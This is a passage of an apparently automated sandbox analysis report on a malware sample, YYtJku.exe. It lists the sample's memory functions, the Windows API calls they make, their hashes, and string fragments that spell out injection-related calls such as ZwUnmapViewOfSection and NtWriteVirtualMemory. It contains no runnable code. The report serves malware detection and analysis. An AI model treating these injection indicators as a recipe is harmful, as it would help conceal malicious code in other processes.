Instruction Fuzzy Hash: E85112B0D102188FEB54CFAAD888BDDBBB1BF48314F558129E815BB391DB74A844CF91

Uniqueness

Uniqueness Score: -1.00%

Function 031F5084, Relevance: 1.6, APIs: 1, Instructions: 118COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 031F51A2

Memory Dump Source

Source File: 00000003.00000002.474795171.00000000031F0000.00000040.00000001.sdmp, Offset: 031F0000, based on PE: false

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: ce7775d649803b117f682d80468d6b83c9fc8c08e6b231f169bda2bce48f65a6
Instruction ID: 4c909d1a2dda5aae36d6d11aa09d0259e063f6e350c45f688d8a624a086f94aa
Opcode Fuzzy Hash: ce7775d649803b117f682d80468d6b83c9fc8c08e6b231f169bda2bce48f65a6
Instruction Fuzzy Hash: 6251D2B1D103099FDB14CF99C884ADEFBB6BF89314F64812AE919AB210D774A945CF90

Uniqueness

Uniqueness Score: -1.00%

Function 031F5090, Relevance: 1.6, APIs: 1, Instructions: 113COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 031F51A2

Memory Dump Source

Source File: 00000003.00000002.474795171.00000000031F0000.00000040.00000001.sdmp, Offset: 031F0000, based on PE: false

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 81ce05b982cf1c3a1ccf3e146259373ca9e2f55033a5a56d7a3527a1d6249a05
Instruction ID: 3aa4ed9224741503ed4f8f99f1864ef1d8010db4dc29bee43f7cff2ca849fefe
Opcode Fuzzy Hash: 81ce05b982cf1c3a1ccf3e146259373ca9e2f55033a5a56d7a3527a1d6249a05
Instruction Fuzzy Hash: 7641E0B1D103099FDB14CF99C884ADEFBB6BF88314F64812AE919AB210D774A945CF90

Uniqueness

Uniqueness Score: -1.00%

Function 031F779C, Relevance: 1.6, APIs: 1, Instructions: 97COMMON

Download Yara Rule

APIs

CallWindowProcW.USER32(?,?,?,?,?), ref: 031F7F09

Memory Dump Source

Source File: 00000003.00000002.474795171.00000000031F0000.00000040.00000001.sdmp, Offset: 031F0000, based on PE: false

Similarity

API ID: CallProcWindow
String ID:
API String ID: 2714655100-0
Opcode ID: 3b05b5725e071221d0b7ee37a58a04cc2cf8b34e58fb45481e3775d6600b0d2f
Instruction ID: 8360fdb6c950a7f51ee27afef63de691a85c004429c5c1d26362fe2e1198af93
Opcode Fuzzy Hash: 3b05b5725e071221d0b7ee37a58a04cc2cf8b34e58fb45481e3775d6600b0d2f
Instruction Fuzzy Hash: BA411AB59002059FDB14CF99C488AAABBF5FF8C314F25C499E529AB361D734A841CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 0667B949, Relevance: 1.6, APIs: 1, Instructions: 92fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNEL32(00000000), ref: 0667BA18

Memory Dump Source

Source File: 00000003.00000002.480950695.0000000006670000.00000040.00000001.sdmp, Offset: 06670000, based on PE: false

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: 69255baffffd348810ddd51c75a4e9d45eb0eb3d5ab64bf8451bed5dde5acc8f
Instruction ID: 34d37d904c2c74fdf3a8a497f6df6a5c5a92f1f43c2e1ceda9173d2c4573d590
Opcode Fuzzy Hash: 69255baffffd348810ddd51c75a4e9d45eb0eb3d5ab64bf8451bed5dde5acc8f
Instruction Fuzzy Hash: 8E31ABB1D042499FCB10DFA9C844BEEBBF4EF49320F15856AE858AB341D7389805CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 06679250, Relevance: 1.6, APIs: 1, Instructions: 68COMMON

Download Yara Rule

APIs

MoveFileExW.KERNEL32(?,00000000,?,?), ref: 0667C030

Memory Dump Source

Source File: 00000003.00000002.480950695.0000000006670000.00000040.00000001.sdmp, Offset: 06670000, based on PE: false

Similarity

API ID: FileMove
String ID:
API String ID: 3562171763-0
Opcode ID: 1151358fa0b02bacc2d88af897bb99575186ca04635879c8e4d0a057d5698c17
Instruction ID: 43ff0f2635863821890ad1d017955db3f687b88e0bc6675d16276d9a2a79764c
Opcode Fuzzy Hash: 1151358fa0b02bacc2d88af897bb99575186ca04635879c8e4d0a057d5698c17
Instruction Fuzzy Hash: 122124B6C012189FCB50CFA9D884ADEBBF4AB48310F15805AE808AB300D7359A44CFE0

Uniqueness

Uniqueness Score: -1.00%

Function 031F6B62, Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 031F6BEF

Memory Dump Source

Source File: 00000003.00000002.474795171.00000000031F0000.00000040.00000001.sdmp, Offset: 031F0000, based on PE: false

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 060173045f402cf338b928a1932ff66ce9f0cd97db7624b63a38af1c64889e47
Instruction ID: fe49f440e61de7ac1d9490fa6c2774a590680218bb7292b9386c5eab1268f47c
Opcode Fuzzy Hash: 060173045f402cf338b928a1932ff66ce9f0cd97db7624b63a38af1c64889e47
Instruction Fuzzy Hash: 4721E2B5900249AFDB10CFA9D984AEEFBF4FF48324F14842AE955A3310D374A955CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 031F6B68, Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 031F6BEF

Memory Dump Source

Source File: 00000003.00000002.474795171.00000000031F0000.00000040.00000001.sdmp, Offset: 031F0000, based on PE: false

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: ddd253693640db8a725bb42781ab5c0e9ca6ebfe8d9ad1496a85d970358f4ac0
Instruction ID: 2d1ada158426ee13d8498ff5456bc1202e1ef947d6fd925251c673c94f1c7c6d
Opcode Fuzzy Hash: ddd253693640db8a725bb42781ab5c0e9ca6ebfe8d9ad1496a85d970358f4ac0
Instruction Fuzzy Hash: 9521C2B5900249AFDB10CFAAD984ADEFBF8EB48324F14841AE955A3310D374A944CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 06679228, Relevance: 1.6, APIs: 1, Instructions: 59fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNEL32(00000000), ref: 0667BA18

Memory Dump Source

Source File: 00000003.00000002.480950695.0000000006670000.00000040.00000001.sdmp, Offset: 06670000, based on PE: false

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: 2abf4aa9dea49b4ef1514fb1ac324ec72edc7600c456d7cd11f10c7507263f45
Instruction ID: a8c9e0090d233b3b8fecd9215d3d22ddf7bdec746d3189d5f09078a27f963918
Opcode Fuzzy Hash: 2abf4aa9dea49b4ef1514fb1ac324ec72edc7600c456d7cd11f10c7507263f45
Instruction Fuzzy Hash: 452133B1C0061A9FCB10DF9AC444BEEFBB4EF48220F05816AE819B7340D738A945CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 031FC191, Relevance: 1.6, APIs: 1, Instructions: 55COMMON

Download Yara Rule

APIs

RtlEncodePointer.NTDLL(00000000), ref: 031FC212

Memory Dump Source

Source File: 00000003.00000002.474795171.00000000031F0000.00000040.00000001.sdmp, Offset: 031F0000, based on PE: false

Similarity

API ID: EncodePointer
String ID:
API String ID: 2118026453-0
Opcode ID: 21729a4af10b761a0b54e3ea05b3cc534efb0ee6937eb788d88fc2cc4a4a67d3
Instruction ID: 323ed730b917124b519a97f55c10595425ec8716c06044ba2b8cd65c7bda4d4a
Opcode Fuzzy Hash: 21729a4af10b761a0b54e3ea05b3cc534efb0ee6937eb788d88fc2cc4a4a67d3
Instruction Fuzzy Hash: EE21ACB19013098FDB20EFA9D5087DEBFF8EB49324F24856AD509B3600C738A544DFA1

Uniqueness

Uniqueness Score: -1.00%

Function 06927414, Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,?,?,00000000,?,069281E1,00000800), ref: 06928272

Memory Dump Source

Source File: 00000003.00000002.481033069.0000000006920000.00000040.00000001.sdmp, Offset: 06920000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: a14f2fe8f84b158fab17aca0301f996bef62479f3f0837dd73c03ce9742d8414
Instruction ID: 29187a5b76e0636d0a6c306ad0d855e73628dda20a085b2bdbaf356789341dcf
Opcode Fuzzy Hash: a14f2fe8f84b158fab17aca0301f996bef62479f3f0837dd73c03ce9742d8414
Instruction Fuzzy Hash: B41117B2D006199FDB10CF9AD944BDEFBF4EB98364F14852AE415A7600C374A546CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 031FC198, Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

RtlEncodePointer.NTDLL(00000000), ref: 031FC212

Memory Dump Source

Source File: 00000003.00000002.474795171.00000000031F0000.00000040.00000001.sdmp, Offset: 031F0000, based on PE: false

Similarity

API ID: EncodePointer
String ID:
API String ID: 2118026453-0
Opcode ID: 19d91d5e08fc71ba865b0f17f0a3305106e6a423709e35ee818276bf6b4d87c9
Instruction ID: 40af938d2256650663383640aa27dd030816e670bea9dd5b51ec62bebebe8adf
Opcode Fuzzy Hash: 19d91d5e08fc71ba865b0f17f0a3305106e6a423709e35ee818276bf6b4d87c9
Instruction Fuzzy Hash: 8811ACB19013098FDB20EFA9D50879EBBF8EB48324F248429D509A3600C738A944DFA1

Uniqueness

Uniqueness Score: -1.00%

Function 06928201, Relevance: 1.6, APIs: 1, Instructions: 54libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,?,?,00000000,?,069281E1,00000800), ref: 06928272

Memory Dump Source

Source File: 00000003.00000002.481033069.0000000006920000.00000040.00000001.sdmp, Offset: 06920000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 881cfe05d2cd64732923571f67e34438bd0dc15c81113cfe2aaa633f22b9984c
Instruction ID: 1f0e1eea5df176e47b146da3ff379632b2dd89b5aad7121413490abe89623651
Opcode Fuzzy Hash: 881cfe05d2cd64732923571f67e34438bd0dc15c81113cfe2aaa633f22b9984c
Instruction Fuzzy Hash: 581114B6D002499FDB10CFAAD844ADEFBF4AB88364F14852AE459A7600C375A546CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 031F3300, Relevance: 1.6, APIs: 1, Instructions: 50COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 031F4116

Memory Dump Source

Source File: 00000003.00000002.474795171.00000000031F0000.00000040.00000001.sdmp, Offset: 031F0000, based on PE: false

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: c71ddc57a3c9f4f7a3153919d6360e3dce0e0ede920b276ab9abcb74cc67bb84
Instruction ID: e81b17a27c8d3ac21c436729b1ce8747b5879bd38f5e4100594cafbfd141c793
Opcode Fuzzy Hash: c71ddc57a3c9f4f7a3153919d6360e3dce0e0ede920b276ab9abcb74cc67bb84
Instruction Fuzzy Hash: A91132B2C002498FDB20DF9AD844BDEFBF4EF89224F15802AD929B7200C774A545CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0692BB48, Relevance: 1.6, APIs: 1, Instructions: 50comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(00000000), ref: 0692BBA5

Memory Dump Source

Source File: 00000003.00000002.481033069.0000000006920000.00000040.00000001.sdmp, Offset: 06920000, based on PE: false

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: 8fa13166f1f2493ae8376d987c8c58b2b1b7656deb6d9727bc978f61d37a0a60
Instruction ID: 4f0d37e700a4c9cdf0e6307b024fb5d29fcfac2c10c7656d307dfeafcc9b1a1f
Opcode Fuzzy Hash: 8fa13166f1f2493ae8376d987c8c58b2b1b7656deb6d9727bc978f61d37a0a60
Instruction Fuzzy Hash: 3E1148B5C002498FCB20DF99E485BDEFBF8EB48324F10845AE415B3A00C334A584CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 031F40AA, Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 031F4116

Memory Dump Source

Source File: 00000003.00000002.474795171.00000000031F0000.00000040.00000001.sdmp, Offset: 031F0000, based on PE: false

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 5d5e2a401748cd838e10fdd0e53868f50945a73dfe6cebf29f84a82731efbf3c
Instruction ID: ff609f3f47a106ae77771ddc52bd3186ac145109662f1a9ba5fb622e1b8a5c4f
Opcode Fuzzy Hash: 5d5e2a401748cd838e10fdd0e53868f50945a73dfe6cebf29f84a82731efbf3c
Instruction Fuzzy Hash: 301134B6C002498FDB10CFAAC444BDEFBF4AF48224F15841AD519B3600C334A145CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0692ABD0, Relevance: 1.5, APIs: 1, Instructions: 46comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(00000000), ref: 0692BBA5

Memory Dump Source

Source File: 00000003.00000002.481033069.0000000006920000.00000040.00000001.sdmp, Offset: 06920000, based on PE: false

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: 1c08708233a757f52ba1e7c7f7042eb4ff83414640aab1b8aeb7252ac8ca7d98
Instruction ID: 32245cdabecf7204065006be2ca1fb72ce6623706697b2b7bffd7c214c9a6c97
Opcode Fuzzy Hash: 1c08708233a757f52ba1e7c7f7042eb4ff83414640aab1b8aeb7252ac8ca7d98
Instruction Fuzzy Hash: 411103B19042498FDB20DF9AD888B9EBBF8EB48328F148459E519B7604C374A944CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 0179D450, Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.473995519.000000000179D000.00000040.00000001.sdmp, Offset: 0179D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 92ff5416b8e11568023ea82d4587c65cb8e1c9d9640b7c93188d4d21b0ae4151
Instruction ID: 31b8a4564a4893d244c73a4384a9c63583dd15195564eef543dcee49947eb064
Opcode Fuzzy Hash: 92ff5416b8e11568023ea82d4587c65cb8e1c9d9640b7c93188d4d21b0ae4151
Instruction Fuzzy Hash: 2621F1B1504240DFDF21DF94E9C0B66FB65FB88324F2485A9E9094B216C336E84ACBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0179D53C, Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.473995519.000000000179D000.00000040.00000001.sdmp, Offset: 0179D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a11d5b8c5cc67cb6da5997e1b7f52edfb69232085dade22547ec4de1527a0a60
Instruction ID: c8d383ff4772b39257ac5dab451c871a31ac43cf293b2a9e1431c042f523e61f
Opcode Fuzzy Hash: a11d5b8c5cc67cb6da5997e1b7f52edfb69232085dade22547ec4de1527a0a60
Instruction Fuzzy Hash: AA21F8B1504240EFDF25DF94E9C0B66FF65FB88328F3485A9E9054B246C336D85AC7A1

Uniqueness

Uniqueness Score: -1.00%

Function 018BD01C, Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.474065581.00000000018BD000.00000040.00000001.sdmp, Offset: 018BD000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3fd2c85443e131c72af60475b6aea58a26337c6a35364e9ac2015b3613364106
Instruction ID: cb8ae673bc91a00c21ab04f47d0270a54f6573eb393e3209d3b113e71cbd34fc
Opcode Fuzzy Hash: 3fd2c85443e131c72af60475b6aea58a26337c6a35364e9ac2015b3613364106
Instruction Fuzzy Hash: 56212575504204EFCB15DF94D8C0B56BB65FB8435CF24C6A9E8098B346C33AD907CA61

Uniqueness

Uniqueness Score: -1.00%

Function 018BD006, Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.474065581.00000000018BD000.00000040.00000001.sdmp, Offset: 018BD000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0ffb5e4810791bfea0e02b80a8a3e905b3b94d5c8486ab63278d8ab90b4244a4
Instruction ID: 675064f31d953ad7cedf29f843062a9a138ea687d4b5a8b38af47eee822a74ad
Opcode Fuzzy Hash: 0ffb5e4810791bfea0e02b80a8a3e905b3b94d5c8486ab63278d8ab90b4244a4
Instruction Fuzzy Hash: 1A2180755083809FCB02CF64D9D4B11BF71EB46314F28C6EAD8498B267C33A985ACB62

Uniqueness

Uniqueness Score: -1.00%

Function 0179D44B, Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.473995519.000000000179D000.00000040.00000001.sdmp, Offset: 0179D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 184b28d4c02099fc0a852538407da5dc7e76361d293f30cbc9c792e0a6473fb9
Instruction ID: ec179d8cbeae0c9d2100d5bbf2ed8e37ad98f793f31376b3a5733e5216d74861
Opcode Fuzzy Hash: 184b28d4c02099fc0a852538407da5dc7e76361d293f30cbc9c792e0a6473fb9
Instruction Fuzzy Hash: D3119A76404280CFDF12CF58E9C4B56FF71FB84324F2886A9D9094A617C33AD45ACBA2

Uniqueness

Uniqueness Score: -1.00%

Function 0179D537, Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.473995519.000000000179D000.00000040.00000001.sdmp, Offset: 0179D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 184b28d4c02099fc0a852538407da5dc7e76361d293f30cbc9c792e0a6473fb9
Instruction ID: 3d8a4236f6eb40aa359379bffc2267d0fe8edd236337011b599bc5652d654a79
Opcode Fuzzy Hash: 184b28d4c02099fc0a852538407da5dc7e76361d293f30cbc9c792e0a6473fb9
Instruction Fuzzy Hash: F811AF76404280DFCF12CF54E9C4B16FF72FB88324F2486A9D8094B616C336D45ACBA1

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: YYtJku.exe PID: 5004 Parent PID: 3388 YYtJku.exeCOMMON

Executed Functions

Function 054C01CB, Relevance: 517.4, Strings: 413, Instructions: 1134COMMON

Download Yara Rule

Strings

NtOp, xrefs: 054C0D70
2.dl, xrefs: 054C041E
ess, xrefs: 054C1082
tVir, xrefs: 054C088B
ue, xrefs: 054C0D2F
tCon, xrefs: 054C0A45
umer, xrefs: 054C063B
wnDl, xrefs: 054C056C
Ex, xrefs: 054C1215
NtCl, xrefs: 054C1036
ease, xrefs: 054C07B0
tAcq, xrefs: 054C0678
lenW, xrefs: 054C0867
ofRe, xrefs: 054C0232
Thre, xrefs: 054C09EB
NtWr, xrefs: 054C0967
ls\u, xrefs: 054C0576
tDec, xrefs: 054C075A
at, xrefs: 054C0C8A
ansa, xrefs: 054C0F1F
tStr, xrefs: 054C0AF9
tHas, xrefs: 054C06D8
reat, xrefs: 054C0DED
etCu, xrefs: 054C0EC9
eUse, xrefs: 054C0E42
Cont, xrefs: 054C07BA
urce, xrefs: 054C08CC
orma, xrefs: 054C0C47
Post, xrefs: 054C1178
iveK, xrefs: 054C0709
aryA, xrefs: 054C080E
.dll, xrefs: 054C04DA
ster, xrefs: 054C1128
ls32, xrefs: 054C0400
ateP, xrefs: 054C0944
ey, xrefs: 054C064F
ash, xrefs: 054C06C4
eeVi, xrefs: 054C100E
NtOp, xrefs: 054C05EC
Show, xrefs: 054C10D3
CoCr, xrefs: 054C1224
ss, xrefs: 054C0FF5
IsWo, xrefs: 054C0FD7
KERNEL32.DLL, xrefs: 054C1392, 054C1398
text, xrefs: 054C0A4F
ls\O, xrefs: 054C05B1
NtOp, xrefs: 054C0E98
ls32, xrefs: 054C03BF
\Ole, xrefs: 054C1270
ePro, xrefs: 054C0DF7
Crea, xrefs: 054C134C
wnDl, xrefs: 054C043B
ad, xrefs: 054C0A2C
ory, xrefs: 054C102C
eA, xrefs: 054C0B3E
ll, xrefs: 054C0F91
troy, xrefs: 054C0788
wnDl, xrefs: 054C03F6
y, xrefs: 054C0600
memc, xrefs: 054C065E
ecti, xrefs: 054C0A90
mInf, xrefs: 054C0377
text, xrefs: 054C0A18
ureA, xrefs: 054C0F5A
wPro, xrefs: 054C115F
eryS, xrefs: 054C10B0
urce, xrefs: 054C0269
py, xrefs: 054C0665
Inst, xrefs: 054C1238
Cryp, xrefs: 054C079C
Cryp, xrefs: 054C06F5
nPai, xrefs: 054C11DE
NtCr, xrefs: 054C0CED
y, xrefs: 054C0BF2
tual, xrefs: 054C0895
oced, xrefs: 054C0F50
le, xrefs: 054C0BC5
roce, xrefs: 054C094E
ey, xrefs: 054C0713
tion, xrefs: 054C09C7
\Kno, xrefs: 054C03EC
\use, xrefs: 054C0494
mbstowcs, xrefs: 054C1371, 054C1374
iteV, xrefs: 054C0971
DefW, xrefs: 054C114B
Memo, xrefs: 054C089F
tDes, xrefs: 054C077E
eate, xrefs: 054C12BA
ss, xrefs: 054C0F6E
lMem, xrefs: 054C1022
l, xrefs: 054C12A7
eryS, xrefs: 054C0283
reat, xrefs: 054C0D48
ZwRo, xrefs: 054C0F01
tDes, xrefs: 054C072C
Find, xrefs: 054C01DD
Cryp, xrefs: 054C0722
Tran, xrefs: 054C0E7A
ce, xrefs: 054C0246
Reso, xrefs: 054C01E7
enFi, xrefs: 054C0BBB
2.dl, xrefs: 054C058A
ath, xrefs: 054C0C79
enSe, xrefs: 054C0EA2
ddre, xrefs: 054C082C
Lock, xrefs: 054C0255
texW, xrefs: 054C1360
viro, xrefs: 054C0AE5
ckTr, xrefs: 054C0F15
mati, xrefs: 054C033C
Libr, xrefs: 054C0807
py, xrefs: 054C1051
Quit, xrefs: 054C1182
l, xrefs: 054C0594
oxA, xrefs: 054C0FCD
ext, xrefs: 054C07C4
Wind, xrefs: 054C10DD
eate, xrefs: 054C0C05
NtOp, xrefs: 054C0BB1
eryV, xrefs: 054C0613
enPr, xrefs: 054C0D7A
hDat, xrefs: 054C06E2
ad, xrefs: 054C09F5
ueKe, xrefs: 054C0BE8
dvap, xrefs: 054C0508
ose, xrefs: 054C1040
n, xrefs: 054C0F33
GetS, xrefs: 054C0363
nsac, xrefs: 054C0EE7
RtlC, xrefs: 054C0DE3
\Kno, xrefs: 054C0562
onPr, xrefs: 054C0346
itia, xrefs: 054C1201
Clas, xrefs: 054C1132
NtQu, xrefs: 054C10A6
tCon, xrefs: 054C0A0E
rs, xrefs: 054C0E1F
kernel32.dll, xrefs: 054C137C, 054C137F
rPro, xrefs: 054C0E4C
Key, xrefs: 054C0792
mory, xrefs: 054C098F
rtua, xrefs: 054C1018
sTok, xrefs: 054C0D8E
sact, xrefs: 054C0E84
ory, xrefs: 054C07F6
sour, xrefs: 054C023C
Regi, xrefs: 054C111E
nt, xrefs: 054C12CE
ZwUn, xrefs: 054C099F
ls32, xrefs: 054C0445
ss, xrefs: 054C0836
odul, xrefs: 054C0B20
NtOp, xrefs: 054C02F7
erne, xrefs: 054C0544
ileg, xrefs: 054C0DC5
le32, xrefs: 054C05BB
NtCr, xrefs: 054C0BFB
ZwCr, xrefs: 054C0E66
tion, xrefs: 054C0EF1
lize, xrefs: 054C120B
mapV, xrefs: 054C09A9
Crea, xrefs: 054C08DC
roce, xrefs: 054C0FEB
on, xrefs: 054C0A9A
l, xrefs: 054C046D
orma, xrefs: 054C02A1
yste, xrefs: 054C028D
\Kno, xrefs: 054C0431
loca, xrefs: 054C02C5
y, xrefs: 054C0927
Expa, xrefs: 054C0AD1
yste, xrefs: 054C036D
n, xrefs: 054C0EB6
en, xrefs: 054C0D98
Reso, xrefs: 054C020E
fSec, xrefs: 054C09BD
tVal, xrefs: 054C0BDE
rmin, xrefs: 054C093A
\Kno, xrefs: 054C03AB
tePr, xrefs: 054C08E6
rtua, xrefs: 054C02D9
layE, xrefs: 054C0CB0
ken, xrefs: 054C0DD9
sW, xrefs: 054C08FA
NtSe, xrefs: 054C0BD4
wnDl, xrefs: 054C125C
\Kno, xrefs: 054C04EA
rThr, xrefs: 054C0D5C
2.dl, xrefs: 054C0463
cW, xrefs: 054C1169
mati, xrefs: 054C0B6B
teWi, xrefs: 054C1100
nt, xrefs: 054C11E8
\ker, xrefs: 054C044F
wcsc, xrefs: 054C0FA0
NtCr, xrefs: 054C12B0
sume, xrefs: 054C09E1
oces, xrefs: 054C030B
ow, xrefs: 054C10E7
dll, xrefs: 054C051C
age, xrefs: 054C1196
sW, xrefs: 054C113C
2.dl, xrefs: 054C129D
NtDe, xrefs: 054C0CA6
User, xrefs: 054C106E
lMem, xrefs: 054C02E3
tion, xrefs: 054C02AB
RtlS, xrefs: 054C0EBF
\Kno, xrefs: 054C059D
ll.d, xrefs: 054C03D3
mInf, xrefs: 054C0297
nfor, xrefs: 054C0332
ls32, xrefs: 054C1266
wcst, xrefs: 054C108C
nmen, xrefs: 054C0AEF
mp, xrefs: 054C0FAA
ls\n, xrefs: 054C04C6
.dll, xrefs: 054C05C5
ad, xrefs: 054C0A63
o, xrefs: 054C0381
esTo, xrefs: 054C0DCF
ombs, xrefs: 054C1096
ls32, xrefs: 054C048A
NtAd, xrefs: 054C0DA7
et, xrefs: 054C0C9D
troy, xrefs: 054C0736
ss, xrefs: 054C0958
eate, xrefs: 054C1064
wnDl, xrefs: 054C05A7
lstr, xrefs: 054C085D
enMu, xrefs: 054C12E7
Mess, xrefs: 054C118C
RtlC, xrefs: 054C0D3E
\Kno, xrefs: 054C0476
wnDl, xrefs: 054C0480
s, xrefs: 054C035A
irtu, xrefs: 054C097B
rren, xrefs: 054C0ED3
rypt, xrefs: 054C0764
Thre, xrefs: 054C0A59
\ntd, xrefs: 054C03C9
iteF, xrefs: 054C0C29
Para, xrefs: 054C0E0B
Cryp, xrefs: 054C06A6
Hash, xrefs: 054C0740
NtCr, xrefs: 054C0AA9
eFil, xrefs: 054C0B2A
r32., xrefs: 054C049E
NtCr, xrefs: 054C105A
Ole3, xrefs: 054C1293
wnDl, xrefs: 054C04BC
Muta, xrefs: 054C12C4
api3, xrefs: 054C0414
alue, xrefs: 054C061D
onFi, xrefs: 054C0B75
ll, xrefs: 054C1284
ls\k, xrefs: 054C053A
tdll, xrefs: 054C04D0
etPr, xrefs: 054C0F46
wnDl, xrefs: 054C04F4
teMu, xrefs: 054C1356
Reso, xrefs: 054C08C2
Cryp, xrefs: 054C066E
ageB, xrefs: 054C0FC3
NtPr, xrefs: 054C0877
Thre, xrefs: 054C0A22
Cryp, xrefs: 054C0774
ory, xrefs: 054C02ED
ddre, xrefs: 054C0F64
ls\a, xrefs: 054C04FE
Rect, xrefs: 054C11C4
Begi, xrefs: 054C11D4
adEx, xrefs: 054C0D0B
en, xrefs: 054C0CDE
tCre, xrefs: 054C06B0
Proc, xrefs: 054C1078
NtQu, xrefs: 054C0279
RtlF, xrefs: 054C0C3D
eNam, xrefs: 054C0B34
cess, xrefs: 054C0E01
Free, xrefs: 054C08B8
Priv, xrefs: 054C0DBB
uire, xrefs: 054C0682
ry, xrefs: 054C08A9
ile, xrefs: 054C0C33
\Kno, xrefs: 054C04B2
NtRe, xrefs: 054C09D7
wcsc, xrefs: 054C0C83
NtQu, xrefs: 054C0609
ndEn, xrefs: 054C0ADB
Sect, xrefs: 054C0ABD
reat, xrefs: 054C0E38
eryI, xrefs: 054C0B57
ateH, xrefs: 054C06BA
ion, xrefs: 054C0E8E
xecu, xrefs: 054C0CBA
ings, xrefs: 054C0B03
l, xrefs: 054C0428
ctio, xrefs: 054C0F29
Thre, xrefs: 054C0D01
pVie, xrefs: 054C0A7C
wcsl, xrefs: 054C0CD4
Cont, xrefs: 054C068C
ance, xrefs: 054C1242
tion, xrefs: 054C0CC4
tDer, xrefs: 054C06FF
ateK, xrefs: 054C0645
mems, xrefs: 054C0C93
Reso, xrefs: 054C025F
\Kno, xrefs: 054C1252
Load, xrefs: 054C0800
lMem, xrefs: 054C07EC
enPr, xrefs: 054C0301
oadD, xrefs: 054C0F87
NtFr, xrefs: 054C1004
eroM, xrefs: 054C0913
NtOp, xrefs: 054C12DD
Cryp, xrefs: 054C0750
enKe, xrefs: 054C05F6
Cryp, xrefs: 054C06CE
NtRe, xrefs: 054C0B8E
wOfS, xrefs: 054C0A86
ion, xrefs: 054C0AC7
ndow, xrefs: 054C110A
ead, xrefs: 054C0D66
NtEn, xrefs: 054C0631
wnDl, xrefs: 054C03B5
ll, xrefs: 054C03DD
KeyP, xrefs: 054C0C6F
NtTe, xrefs: 054C0930
cess, xrefs: 054C0E56
tant, xrefs: 054C12F1
rocA, xrefs: 054C0822
ctio, xrefs: 054C0EAC
tRel, xrefs: 054C07A6
LdrL, xrefs: 054C0F7D
GetP, xrefs: 054C0818
rent, xrefs: 054C0C5B
urce, xrefs: 054C0218
Fill, xrefs: 054C11BA
l32., xrefs: 054C054E
s, xrefs: 054C0315
RtlC, xrefs: 054C0E2E
on, xrefs: 054C10C4
Mess, xrefs: 054C0FB9
nel3, xrefs: 054C0459
rtua, xrefs: 054C07E2
Size, xrefs: 054C0228
le, xrefs: 054C0BA2
Load, xrefs: 054C0204
iewO, xrefs: 054C09B3
.dll, xrefs: 054C0853
\adv, xrefs: 054C040A
adVi, xrefs: 054C07D8
ExW, xrefs: 054C1114
W, xrefs: 054C0B0D
NtRe, xrefs: 054C07CE
i32., xrefs: 054C0512
CoIn, xrefs: 054C11F7
llba, xrefs: 054C0F0B
Key, xrefs: 054C0627
\Kno, xrefs: 054C0526
dll, xrefs: 054C04A8
eate, xrefs: 054C122E
